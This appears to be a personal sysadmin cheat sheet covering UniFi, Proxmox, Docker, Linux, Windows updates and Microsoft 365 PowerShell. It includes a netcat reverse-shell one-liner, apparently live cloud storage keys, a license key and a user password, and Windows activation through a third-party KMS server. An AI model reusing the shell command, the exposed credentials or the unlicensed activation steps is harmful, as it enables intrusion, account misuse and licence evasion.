UniFi

Adopt Devices

CKEL controller:

set-inform https://unifi.cktechx.com:8080/inform 

set-inform http://unifi.cktechx.com:8080/inform 

Resolve Controller:

set-inform https://unifi.resolvetech.biz:8080/inform

Unknown[12] Error, rufn this instead:

set-inform http://unifi.resolvetech.biz:8080/inform

 20.246.74.195

set-inform http:/20.246.74.195:8080/inform

CertBot

sudo systemctl stop nginx

sudo certbot certonly --standalone -d unifi.cktech.org

sudo nano /etc/nginx/sites-available/unifi

sudo certbot certonly --standalone -d unifi.yourdomain.com

sudo certbot certonly --standalone -d unifi.cktech.o

Proxmox

Resize Container

pct resize <CTID> rootfs +10G

Proxmox V8

pve7to8 --full

Re-generate Self-Signed Certificates

Node will either be pve or galaxy

rm /etc/pve/pve-root-ca.pem

rm /etc/pve/priv/pve-root-ca.key

rm /etc/pve/nodes/<node>/pve-ssl.pem

rm /etc/pve/nodes/<node>/pve-ssl.key

After removal run the following command and reboot:

pvecm updatecerts -f

Proxmox VE v9 Upgrade

# 1. Pre-flight check

pve8to9 --full

# 2. Switch APT sources to Trixie + PVE 9 (no-subscription)

sed -i 's/bookworm/trixie/g' /etc/apt/sources.list

sed -i 's/bookworm/trixie/g' /etc/apt/sources.list.d/pve-enterprise.list 2>/dev/null || true

echo "deb http://download.proxmox.com/debian/pve trixie pve-no-subscription" > /etc/apt/sources.list.d/pve-no-sub.list

# Optional: Ceph sources (if you run Ceph, replace quincy with reef)

# echo "deb http://download.proxmox.com/debian/ceph-quincy trixie no-subscription" > /etc/apt/sources.list.d/ceph.list

# 3. Update + upgrade

apt update && apt full-upgrade -y

# 4. Reboot into Proxmox VE 9

reboot

macOS OSK Key for virtual machine use:

ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc

Windows KMS Activation

KMS Keys

Windows 10/11 Pro

W269N-WFGWX-YVC9B-4J6C9-T83GX

Windows Server 2022 Standard

VDYBN-27WPP-V4HQT-9VMD4-VMK7H

Activation

Windows 11

Slmgr /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX

Slmgr /skms kms8.msguides.com

slmgr /ato

Win Server 2022

 DISM /online /Set-Edition:ServerStandard /ProductKey:VDYBN-27WPP-V4HQT-9VMD4-VMK7H /AcceptEula

Slmgr /ipk VDYBN-27WPP-V4HQT-9VMD4-VMK7H

Slmgr /skms kms8.msguides.com

slmgr /ato

Windows Server 2025 Standard        TVRH6-WHNXV-R9WG3-9XRFY-MY832

Windows Server 2025 Datacenter        D764K-2NDRG-47T6Q-P8T8W-YP6DF

Windows Server 2025 Datacenter: Azure Edition        XGN3F-F394H-FD2MY-PP6FD-8MCRC

Windows Server 2025

 DISM /online /Set-Edition:ServerStandard /ProductKey:TVRH6-WHNXV-R9WG3-9XRFY-MY832 /AcceptEula

Slmgr /ipk TVRH6-WHNXV-R9WG3-9XRFY-MY832

Slmgr /skms kms8.msguides.com

slmgr /ato

Re-arm 180 Days

slmgr -rearm

Pull Licensing info via CLI

This command displays the license information for the Windows installation in a pop-up window:

slmgr.vbs /dli

Get Additional Details

slmgr.vbs /dlv

Pull Windows License

(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey

Get Activation Status

slmgr /xpr

Linux Append content

#to a file to a directory

for d in /data/projects/*/; do

  [ -d "$d" ] || continue

  if [ -f "$d/.gitignore" ]; then

    grep -qxF "CLAUDE.md" "$d/.gitignore" || echo "CLAUDE.md" >> "$d/.gitignore"

  else

    echo "CLAUDE.md" > "$d/.gitignore"

  fi

done

Linux Distro & Version via CLI

lsb_release -d

Linux Unattended Upgrades

apt install unattended-upgrades

dpkg-reconfigure --priority=low unattended-upgrades

Device Uptime (Linux)

uptime -p

Network Settings

ip a

Old Net Settings

 Ifconfig

Install Screen Connect

sudo dpkg -i ConnectWiseControl.ClientSetup.deb

display the value of the PATH variable

echo $PATH

Search manual

this will search the Which input

man -k which

SSH Setup

sudo apt update && sudo apt upgrade

sudo apt install openssh-client

sudo apt install openssh-server

sudo systemctl status ssh

sudo ufw allow ssh

Enable Root Login (SSH)

nano /etc/ssh/sshd_config

PermitRootLogin yes

Can also enable PubkeyAuthentication and disable password login when using SSL Key based authentication

Install SSH Server

sudo apt install openssh-server

sudo systemctl status ssh

SSH Hardening

Sudo vim /etc/ssh/sshd_config

Uncomment port 22 and change it to anything under 1024

Insert mode (i) → 22 → 888

ESC (command mode)

:wq

Sudo systemctl restart sshd

SSH Key Authentication

ssh-keygen -t ed25519

ssh-keygen -t rsa

mkdir ~/.ssh && chmod 700 ~./ssh

Linux Copy key to authorized_keys

Ssh-copy-id root@10.3.0.10

Windows:

Scp $env:USERPROFILE/.ssh/ id_ed25519.pub chris@10.3.6.9:~/.ssh/authorized_keys

Alternatively, just create a new keychain in Termius and copy the key to the authorized_keys file. Do NOT save the passphrase to termius, store password in Bitwarden

Copy key to authorized_keys

Ssh-copy-id root@10.3.0.10

Restart SSH

Sudo systemctl restart sshd

Kali Updates

sudo apt update && sudo apt full-upgrade -y

Uncomplicated Firewall (UFW)  Setup

Sudo apt install ufw

Sudo ufw status

Sudo ufw allow 888

Sudo ufw enable

Sudo ufw allow ‘Apache’

Sudo ufw allow ‘Apache Full’

Sudo ufw allow Nginx

sudo ufw status numbered

Sudo ufw delete 1 (example)

Ubuntu Package Manager issue (21.10)

sudo apt-get install -f

popOS Updates

sudo apt update

sudo apt full-upgrade

Linux Redirection

Cat 1> output txt

Cat > output1.txt

nmap -sS domain.com

-sV (service version)

Reverse Shell

Nc -lnvp 87 -s 10.1.1.1  (IP to listen to on x port)

Nc -e /bin/bash 10.1.1.1 87

PSEXEC

TBD…

Bash Scripts

chmod +x script.sh

./script.sh

Docker

Cheatsheet

https://github.com/ChristianLempa/cheat-sheets/blob/main/tools/docker.md 

Instal

sudo apt update && sudo apt upgrade -y

sudo apt install -y apt-transport-https ca-certificates curl software-properties-common

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

sudo apt update

sudo apt install -y docker-ce docker-ce-cli containerd.io

docker --version

View active instances

docker ps

Create Volume

sudo docker volume create vname

Remote into container

docker exec -it acmesh-acme.sh-1 /bin/sh

docker exec -it acmesh-acme.sh-1 bash

Docker Compose

Installation

sudo curl -L "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose

sudo chmod +x /usr/local/bin/docker-compose

docker-compose --version

Portainer 

Docker Management

Business license:

2-WROdVQVBRPljDdBHvbiGglZkUjoHY0+4DaY+c9dhJLrxQUBd5w+qLYmQi1any2Cbfdr60MBMOCncoA==

Installation

# Create portainer Volume

sudo docker volume create portainer_data

#Pull latest EE version (You can skip to next step and just do -ce instead for community

sudo docker pull portainer/portainer-ee:latest

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer-ee:latest

=== OPT ===
sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer/portainer-ee

=== OPT ===

docker run -d \

  -p 9001:9001 \

  --name portainer_agent \

  --restart=always \

  -v /var/run/docker.sock:/var/run/docker.sock \

  -v /var/lib/docker/volumes:/var/lib/docker/volumes \

  -v /:/host \

  portainer/agent:2.21.5

OLD Portainer Deployment

docker volume create portainer_data

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer-ee:latest

Upgrade portainer

docker stop portainer

docker rm portainer

docker pull portainer/portainer-ce:latest

docker run -d -p 9443:9443 -p 8000:8000 --name=portainer --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer-ce:latest

sudo apt-get update

sudo apt-get install certbot python3-certbot-nginx

sudo certbot --nginx -d cktech.org

sudo docker pull portainer/portainer-ce

sudo docker volume create portainer_data

sudo docker run -d -p 9443:9443 -p 8000:8000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v /srv/portainer:/data portainer-ee:latest

WINGET

Update Packages

winget update –all

Include unknown

 winget update --all --include-unknown

Other:

winget upgrade --all --accept-package-agreements

Notes

https://learn.microsoft.com/en-us/windows/package-manager/winget/ 

https://github.com/microsoft/winget-cli

Winget search appname

Winget install appname (or app id - spaces require “ “ when spaces i.e. “Github Desktop” )

Winget upgrade appname

#Command to update all applications

Winget upgrade —all

winget install -e --id tailscale.tailscale

Winget ships with windows now but I had issues running it via Powershell on a few of my computers. Not sure what’s changed but I can’t just run winget upgrade –all in powershell. Potential workaround is add the path to winget and run in command prompt

Add Winget to PATH

C:\Users\chris\AppData\Local\Microsoft\WindowsApps\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe

Add App Package to Powershell

Add-AppxPackage -RegisterByFamilyName -MainPackage Microsoft.DesktopAppInstaller_8wekyb3d8bbwe

Screen connect Testing

#timeout=1000000

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --all --accept-source-agreements

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" search "Google Chrome" --accept-source-agreements

find which version of DesktopAppInstaller is installed

dir "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller*"

Working, to update all packages

#timeout=1000000

#maxlength=1000000

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --all --include-unknown --silent --accept-source-agreements

C:\WINDOWS\system32>"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" upgrade --name "Google Chrome" --silent --accept-source-agreements

"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.19.11071.0_x64__8wekyb3d8bbwe\winget.exe" show "Google Chrome" --accept-source-agreements

KASM

Initial Setup (Ubuntu Server)

sudo dd if=/dev/zero bs=1M count=1024 of=/mnt/1GiB.swap

sudo chmod 600 /mnt/1GiB.swap

sudo mkswap /mnt/1GiB.swap

sudo swapon /mnt/1GiB.swap

Verify Swap

cat /proc/swaps

make sure swap comes back after a reboot

adds to the FS tab file

echo ‘/mnt/1GiB.swap swap swap defaults 0 0’ | sudo tee -a /etc/fstab

Installation

wget  https://kasm-static-content.s3.amazonaws.com/kasm_release_1.16.0.f2d6e1.tar.gz

unzip file

tar -xf kasm_release*.tar.gz

run installation script

sudo bash kasm_release/install.sh

Certbot setup Legacy

apt install certbot -y

Certbot certonly –standalone -d kasm.cktech.org

Replace SELF_SIGNED Certs:

sudo /opt/kasm/bin/stop

cp /etc/letsencrypt/live/kasm.cktech.org/fullchain.pem /opt/kasm/current/certs/kasm_nginx.crt

cp /etc/letsencrypt/live/kasm.cktech.org/privkey.pem /opt/kasm/current/certs/kasm_nginx.key

sudo /opt/kasm/bin/start

Setup Cron Job for renewal

OTHER

sudo certbot renew --force-renewal -d kasm.cktech.org

sudo certbot certificates

sudo certbot renew

Google Email Security

DKIM

https://apps.google.com/supportwidget/articlehome?article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F174124&product_context=174124&product_name=UnuFlow&trigger_context=a 

SPF Record

TXT record

Host: @

Value: v=spf1 include:_spf.google.com ~all

TTL: 1 Hour or 3600 seconds

DMARC Record

Start

Add a DNS TXT record for _dmarc
TXT Record name _dmarc.cktech.org (Some DNS providers automatically add the domain to the end)

TXT Record Value:

v=DMARC1; p=none; rua=mailto:reports@cktech.org

Phase 2 (Quarantine a small number)

v=DMARC1; p=quarantine; pct=5; rua=mailto:reports@cktech.org 

v=DMARC1; p=reject; rua=mailto:reports@cktech.org;

v=DMARC1; p=reject; rua=mailto:reports@cktech.org; adkim=s; aspf=s;

v=DMARC1; p=reject; rua=mailto:postmaster@cktech.org, mailto:reports@cktech.org; pct=100; adkim=s; aspf=s

Microsoft365 Email Security

You can go to Admin Center and go to Settings → Domains and review Domain DNS records and or a health check.

https://www.namecheap.com/support/knowledgebase/article.aspx/9666/2208/setting-up-microsoft-365-with-a-namecheap-domain/ 

https://lazyadmin.nl/office-365/configure-dkim-office-365/ 

SPF Record

TXT Record

Name: @

Value: v=spf1 include:spf.protection.outlook.com -all

DKIM

https://lazyadmin.nl/office-365/configure-dkim-office-365/ 

Host Name : selector1._domainkey

Points to address or value: selector1-cktechnology-org._domainkey.crktechnology.onmicrosoft.com

Host Name : selector2._domainkey

Points to address or value: selector2-cktechnology-org._domainkey.crktechnology.onmicrosoft.com

M365 DKIM Test & Check

https://admin.microsoft.com/AdminPortal/?searchSolutions=DKIM#/homepage 

DMARC

https://lazyadmin.nl/office-365/office-365-dmarc/ 

Starter less restrictive:

v=DMARC1; p=none; rua=mailto:dmarc@cktechnology.org

TXT RECORD:

Host: _dmarc

value: v=DMARC1; p=reject; rua=mailto:dmarc@cktechnology.org; ruf=mailto:dmarc@cktechnology.org; pct=100; adkim=s; aspf=s

Pihole 

curl -sSL https://install.pi-hole.net | bash

echo "deb https://packages.pi-hole.net/ubuntu $(lsb_release -sc) main" | sudo tee /etc/apt/sources.list.d/pihole.list

curl -sSL https://raw.githubusercontent.com/pi-hole/pi-hole/master/automated%20install/basic-install.sh | sudo bash

Update

pihole -up

Update Gravity

pihole -g

change  password

sudo pihole -a -p

Update

sudo apt-get upgrade pihole

sudo systemctl restart pihole-FTL.service

QEMU

sudo apt install -y qemu qemu-kvm libvirt-daemon libvirt-clients bridge-utils virt-manager

sudo systemctl status libvirtd

Arch Linux

Reload initramfs

sudo mkinitcpio -P

Fix Mirror List

# Refresh Chaotic AUR mirrors if you're getting 404 or connection errors

sudo pacman -Sy chaotic-mirrorlist

sudo pacman -Syyu  # Full system refresh using updated mirror

Snapper

Install

sudo pacman -S snapper snap-pac

sudo btrfs subvolume create /.snapshots

sudo chmod 750 /.snapshots

sudo chown :wheel /.snapshots

sudo blkid | grep nvme0n1p2

UUID=your-root-uuid  /.snapshots  btrfs  subvol=@.snapshots,noatime,compress=zstd:3  0 0

sudo mount /.snapshots

sudo snapper -c root create --description "Initial root snapshot"

sudo snapper -c root list

sudo snapper -c home create-config /home

sudo chmod 750 /home/.snapshots

sudo chown :wheel /home/.snapshots

sudo snapper -c home create --description "initial home snapshot"

sudo snapper -c home list

sudo systemctl enable --now snapper-timeline.timer

sudo systemctl enable --now snapper-cleanup.timer

Update b2 sums (pkgbuild)

updpkgsums

Check Nvidia Logs

journalctl -b0 --grep="nvidia" --no-pager

Additional Setup

sudo nano /etc/pacman.conf

uncomment - color and paralleldownloads

add below: ILoveCandy

sudo pacman -Sy

sudo pacman -S cargo

sudo Pacman -S reflector

sudo cp /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.bak

sudo reflector --verbose --latest 10 --protocol https --sort rate --save /etc/pacman.d/mirrorlist

Pacman -Syu

pacman -S nano vim neofetch

KDE Wayland

pacman -Sy xorg plasma kde-applications plasma-wayland-session

Wayland Session KDE (NVIDIA)

sudo pacman -Sy xorg plasma kde-applications plasma-wayland-session

X11 session

pacman -Sy xorg plasma kde-applications sddm

Install AUR 

sudo pacman -S –needed base-devel

sudo pacman -S git

git clone https://aur.archlinux.org/yay.git

cd yay

makepkg -si

to install a package using yay

yay -S package

Gnome shell

yay -S chrome-gnome-shell

Google chrome

yay -S google-chrome

remove package

yay -Rns package

Update system packages

yay -Syy

Perform a full upgrade

yay -Syu

View more options

man yay

Gnome42 arch

pacman -Sy gnome gnome-extra

 sudo pacman -S flatpak

sudo pacman -S kaccounts-providers

sudo pacman -S kio-gdrive

KDE Reset Configuration

rm ~/.config/plasma-org.kde.plasma.desktop-appletsrc

rm ~/.config/plasmashellrc

rm ~/.config/plasmarc

Install Visual Studio Code

sudo pacman -S –needed git base-devel

git clone https://aur.archlinux.org/visual-studio-code-bin.git

cd visual-studio-code-bin

makepkg -si

Method 2

yay -S visual-studio-code-bin

Make command is building your own application/package
sudo pacman -S vim

sudo pacman -SY vim

Unzip Files

Arch Based

tar xvf linux-5.18-rc3.tar.gz

sudo pacman -Syu

sudo pacman -Syyu

Sudo pacman -S git

Git clone https://aur.archlinux.org/yay-git.git 

Sudo pacman -S –needed base-devel git

Yay -S google-chrome

sudo Pacman -S google-chrome

Sudo pacman -S steam

sudo pacman -S discord

Sudo pacman -S snapd

sudo systemctl enable –now snapd.socket

sudo snap install signal-desktop

sudo snap install youtube-music-desktop-app

Manjaro switch branch

sudo pacman-mirrors  --api --set-branch unstable

sudo mhwd-kernel --list

sudo mhwd-kernel --install linux518

Manjaro Automatic Installation Nvidia Driver Manjaro Repository

sudo mhwd -a pci nonfree 0300

Further configure settings

nvidia-settings

Fedora  

Update

sudo dnf upgrade

Print System info

uname -mrs

reboot

sudo reboot

sudo shutdown -r now

Pop! OS

Wayland

sudo vim /etc/gdm3/custom.conf
waylandEnable=true

ESC

:wq

systemctl restart gdm3

Session Type

Echo #XDG_SESSION_TYPE

popOS tweak Applications menu

cd /usr/share/gnome-shell/extensions/pop-cosmic@system76.com

sudo vim dark.css

#Nord colors

.cosmic-applications-dialog

        Background-color: #252631;

#alternate

#1B1B1B

TimeShift

Arch Based

sudo pacman -S git

sudo pacman -Syu

git clone https://aur.archlinux.org/timeshift.git

cd timeshift

makepkg -si

Timeshift via AUR

yay -S timeshift

Debian Setup

sudo add-apt-repository -y ppa:teejee2008/ppa

sudo apt-get update

sudo apt-get install timeshift

Backblaze B2

keyID:

0048d61b5cd88bb0000000001

keyName:

CK-SYN

applicationKey:

K004gfhqMFZ8FHUCfk2wx6bIgXXU9CE

Wasabi Bucket

access-key= SLZ2V28CUSVKRLXSQC0V

secret-key= rDjgMv0bR4WqRU6zB2ebK4S1scAhlzddFyA7v98p

Subnet CheatSheet

Power Options

View Power Options in CLI  

powercfg /getactivescheme

Set High Performance Powerplan CLI

powercfg.exe /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c

Disable Network Adapter

netsh interface set interface "YOUR-ADAPTER-NAME" disable

NETSH Commands

Runs a report

netsh wlan show wlanreport

Show Wifi Settings etc.

netsh wlan show interfaces

Resolvetech Maintenance

Scheduled defender scans

Run via Screen Connect Terminal

#!ps

Set-MpPreference -ScanParameters 2

#!ps

Set-MpPreference -RemediationScheduleDay 4

#!ps

Set-MpPreference -RemediationScheduleTime 21:00:00

#!ps

Get-MpComputerStatus

Update Portainer Agents on Linux Servers

sudo docker stop portainer_agent && sudo docker rm portainer_agent && sudo docker pull portainer/agent:latest && sudo docker run -d -p 9001:9001 --name portainer_agent --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v /var/lib/docker/volumes:/var/lib/docker/volumes portainer/agent:latest

Windows Updates

Screen Connect Method

Reboot

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

No Reboot

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -IgnoreReboot

#3 hours

shutdown /r /t 10800

#6 hours

shutdown /r /t 21600

Backstage via Powershell

With Restart

Set-ExecutionPolicy Unrestricted

Get-WindowsUpdate -install -acceptall -autoreboot

#do after restart

Set-ExecutionPolicy Restricted

Without Restart

Set-ExecutionPolicy Unrestricted

Get-WindowsUpdate -install -acceptall

Set-ExecutionPolicy Restricted

Command Prompt Backstage

Regular Updates

Powershell.exe -EP Unrestricted iwr "https://raw.githubusercontent.com/ResoTech/public-misc/main/UpdateWindows.ps1" -o winup.ps1";.\winup.ps1

No Reboot

Powershell.exe -EP Unrestricted iwr "https://raw.githubusercontent.com/ResoTech/public-misc/main/UpdateNoReboot" -o winupNoRe.ps1";.\winupNoRe.ps1

Update to 22H2 Silently

Powershell.exe -EP Unrestricted iwr "https://raw.githubusercontent.com/ResoTech/public-misc/main/Silent22H2.ps1" -o winup22h2.ps1";.\winup22h2.ps1

Unsupported hardware Upgrade to Win11

D: or E: to access mounted iso

Cd sources

setupprep.exe /product server

CLI Restart

Shutdown -r -f -t 00

Query Logged in window users

query user

Powershell

Windows Updates

Restarts (Warning can prompt users)

#3 hours

shutdown /r /t 10800

#6 hours

shutdown /r /t 21600

Install

1. powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted
2. powershell Install-Module PSWindowsUpdate or Import-Module PSWindowsUpdate

Screenconnect:

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

Additional

$HideList = "KB5005565", "KB5005566"

Get-WindowsUpdate -KBArticleID $HideList –Hide

Uninstall Updates:

Remove-WindowsUpdate -KBArticleID KB5005565-NoRestart

wusa /uninstall /kb:5005565

Unhide it:

Get-WindowsUpdate -KBArticleID $HideList -WithHidden -Hide:$false

Get-WindowsUpdate -KBArticleID KB5005565 $HideList -WithHidden -Hide:$false

Install updates

Get-WindowsUpdate -install -acceptall -autoreboot

Install Updates no Restart

Get-WindowsUpdate -install -acceptall

Get-WindowsUpdate –IsHidden

Remove-WindowsUpdate -KBArticleID KB5005565 -NoRestart

Optional: install individual patch

Get-WindowsUpdate -KBArticleID KB890830 -install

Get-WindowsUpdate -KBArticleID KB5005565 -install

ScreenConnect Command

#!ps

#timeout=1000000

Get-WindowsUpdate -install -acceptall -autoreboot

Windows Updates Script

===========================================

# Set execution policy to unrestricted

Set-ExecutionPolicy -ExecutionPolicy Unrestricted

# Install the PSWindowsUpdate module

Install-Module -Name PSWindowsUpdate

# Import the module

Import-Module -Name PSWindowsUpdate

# Check for updates

$Updates = Get-WUInstall

# Install updates

if ($Updates) {

    Write-Output "Installing updates..."

    Install-WindowsUpdate -Install -AcceptAll -AutoReboot

}

else {

    Write-Output "No updates available."

}

Exchange Online

Installation:

Install-Module -Name ExchangeOnlineManagement

OR

Install-Module ExchangeOnlineManagement

Connect

Connect-ExchangeOnline

Add M365 Users To Groups

Connect-ExchangeOnline

Connect-MsolService

#Get Group ObjectID

Get-MsolGroup

#Adds user to a group Confirm with yes

Add-UnifiedGroupLinks -Identity "Employee Vacation" -LinkType Members -Links Bwheeler@M365B202155.OnMicrosoft.com -confirm

# 2.  Next we need to add the user to Self Service Password reset group

#grab user Object ID from Azure AD

Get-MsolUser -UserPrincipalName "youraccount@o365.onmicrosoft.com”| Select-Object *|Format-List

#Grab the group Object ID

Get-MsolGroup

#add user to group, first add the group Object ID and second is the member ObjectID

Add-MsolGroupMember -GroupObjectId 7d80c38a-5d49-44a1-90c8-57836e5c2f2e -GroupMemberType User  -GroupMemberObjectId 8d48c20b-a054-4cc3-9ac2-c47ea58f0eda

Enable or Disable OWA access

Import-Module ExchangeOnlineManagement

Connect-ExchangeOnline -UserPrincipalName admin@M365x486451.onmicrosoft.com

Set-CASMailbox kylem@baronmachine.com -OWAEnabled $false

Set-CASMailbox AlexW@M365x486451.OnMicrosoft.com -OWAEnabled $true

Enable Hyper-V

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All

Get M365 Licensing

# Example below

# for psim had to pull users and total licenses for Microsoft Project, this can be used for any M365 license

1. Connect-MsolService

2. Get-MsolAccountSku

3. Get-MsolUser | Where-Object {($_.licenses).AccountSkuId -match "PROJECTCLIENT"}

Active Directory

Get-ADUser -Identity justinb -Properties LockedOut | Select-Object samaccountName,Lockedout| ft -AutoSize

Get-ADUser justinb -Properties Name,lockoutTime |

Select-Object Name,@{n='lockoutTime';e={[DateTime]::FromFileTime($_.lockoutTime)}}

Unlock-ADAccount justinb –Confirm

# verify

Get-ADUser -Identity justinb | Unlock-ADAccount

Get-ADUser -Identity justinb -Properties LockedOut | Select-Object samaccountName,Lockedout

Disable users in AD with Powershell

Disable-ADAccount -Identity danm

Confirmed with the following Command:

Get-ADUser dbehike | select name, Enabled

Get-ADUser danm | select name, Enabled

Disable Welcome email M365 Groups

Set-ExecutionPolicy RemoteSigned

Install-Module PowerShellGet -Force

Install-Module ExchangeOnlineManagement

Connect-ExchangeOnline

#Disable welcome message

Connect-ExchangeOnline

Set-UnifiedGroup -Identity "nhvacation@psimp.com" -UnifiedGroupWelcomeMessageEnable:$false

M365 User Onboarding

#connect the tenant

Connect-MsolService

#For License assignment

Get-MsolAccountSku

#create new user

New-MsolUser -UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" -DisplayName "Jason Born" -FirstName "Jason" -LastName "Born" -UsageLocation "US" -LicenseAssignment M365x486451:ENTERPRISEPREMIUM

#set the password

Set-MsolUserPassword –UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" –NewPassword "uglySneeze46" -ForceChangePassword $False

#To remove accounts (for whatever reason- accidentally added etc.)

To Remove user :

Remove-MsolUser -UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" -Force

Windows Defender

Get-MpThreat

Get-MpPreference

Get-MpThreatDetection

Get-MpThreatDetection (Defender) | Microsoft Docs

Full Defender Scan

start-mpscan -scantype fullscan

Enable Safe Attachments for Sharepoint, OneDrive and Teams

Connect-ExchangeOnline

Set-AtpPolicyForO365 -EnableATPForSPOTeamsODB $true

Verify:

Get-ATPPolicyForO365

Disable Windows Defender Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Defender for O365

#Use PowerShell to view rules for preset security policies

Get-ATPBuiltInProtectionRule

Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"

#view both at the same time

Write-Output -InputObject ("`r`n"*3),"EOP rule - Standard preset security policy",("-"*79);Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"; Write-Output -InputObject ("`r`n"*3),"Defender for Office 365 rule - Standard preset security policy",("-"*79);Get-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"

#Built in protection preset

Set-ATPBuiltInProtectionRule -Identity "ATP Built-In Protection Rule" -ExceptIfRecipientDomainIs <"domain1","domain2",... | $null> -ExceptIfSentTo <"user1","user2",... | $null> -ExceptIfSentToMemberOf <"group1","group2",... | $null>

Microsoft 365 In-place archive (outlook)

#connect Exchange Online via Powershell and Sign-in as global admin

Connect-ExchangeOnline

Enable for user

Enable-Mailbox -Identity <username> -Archive

Enable Tenant wide

Set-OrganizationConfig -AutoExpandingArchive

Send as Alias Exchange Online

Set-executionPolicy Remotesigned

Install-Module ExchangeOnlineManagement -AllowClobber -force

Connect-ExchangeOnline

Get-OrganizationConfig | select SendFromAliasEnabled

#SET

Set-OrganizationConfig -SendFromAliasEnabled $true

#VALIDATE

Get-OrganizationConfig | select SendFromAliasEnabled

Add Domain/address to Safe Senders

Get-Mailbox -ResultSize Unlimited | Set-MailboxJunkEmailConfiguration -TrustedSendersAndDomains @{Add="resolvetech.biz","support@resolvetech.biz"}

M365 Message Trace & Quarantined mail

Get-QuarantineMessage –SenderAddress accounting@compoundingsolutions.net | Release-QuarantineMessage -ReleaseToAll

Get-MessageTrace -SenderAddress accounting@compoundingsolutions.net -RecipientAddress ap@psimp.com -StartDate 1/03/2023 -EndDate 1/13/2023

(Get-QuarantineMessage).identity | ForEach {Get-QuarantineMessage -Identity $_} | Where {$_.QuarantinedUser -ne $null}

Get-QuarantineMessage –SenderAddress accounting@compoundingsolutions.net | Release-QuarantineMessage -ReleaseToAll

Get-MessageTrace -SenderAddress *.comcast.net -RecipientAddress ap@psimp.com -StartDate 1/03/2023 -EndDate 1/13/2023

Disable Viva Insight Emails

Get current setting

Get-UserBriefingConfig

Get-UserBriefingConfig -Identity brian.wheeler@psimp.com

Disable for single user

Set-UserBriefingConfig -Identity meganb@lazydev.onmicrosoft.com -Enabled $false

Disable Viva Completely for all users

# Get all users from Exchange Online

$user = Get-User

# Disable Microsoft Viva Briefing

$users | Foreach { Set-UserBriefingConfig -Identity $_.UserPrincipalName -Enabled $false }

Trace & Quarantined Mail Exchange Online

Quarantined message to txt file

Get-QuarantineMessage -SenderAddress "voicemail@noveliron.com" | Out-File C:\quarantined.txt

quarantine Messages to console

Get-QuarantineMessage -SenderAddress "voicemail@noveliron.com"

messagetrace output to txt file

$startDate = (Get-Date).AddDays(-10)

$endDate = Get-Date

Get-MessageTrace -StartDate $startDate -EndDate $endDate  -SenderAddress voicemail@noveliron.com | Select-Object Timestamp, SenderAddress, RecipientAddress, Status, Received, Subject | Out-File C:\trace.txt

message trace output to console

$startDate = (Get-Date).AddDays(-10)

$endDate = Get-Date

Get-MessageTrace -StartDate $startDate -EndDate $endDate  -SenderAddress voicemail@noveliron.com | Select-Object Timestamp, SenderAddress, RecipientAddress, Status, Received, Subject

messagetrace brian

Get-MessageTrace -RecipientAddress romil.patel@psimp.com -StartDate 02/15/2023 -EndDate 02/16/23

MFA Enforcement

Connect to Azure AD

Connect-AzureAD

Prompt for main office IP address

$MainOfficeIP = Read-Host "Enter the main office IP address (e.g. 0.0.0.0/32)"

Create a named location for the main office

$MainOfficeLocation = New-AzureADMSNamedLocation -DisplayName "Main Office" -Locations $MainOfficeIP

Check Device Uptime

(get-date) - (gcim Win32_OperatingSystem).LastBootUpTime

Exchange Meeting Rooms Working Hours

Set-MailboxCalendarConfiguration -Identity MainConferenceRoom@noveliron.com -WorkingHoursStartTime 07:00:00

Set-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com -WorkingHoursStartTime 07:00:00

Set-MailboxCalendarConfiguration -Identity MainConferenceRoom@noveliron.com -WorkingHoursTimeZone "Eastern Standard Time"

Set-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com -WorkingHoursTimeZone "Eastern Standard Time"

 Get-MailboxCalendarConfiguration -Identity mainconferenceroom@noveliron.com

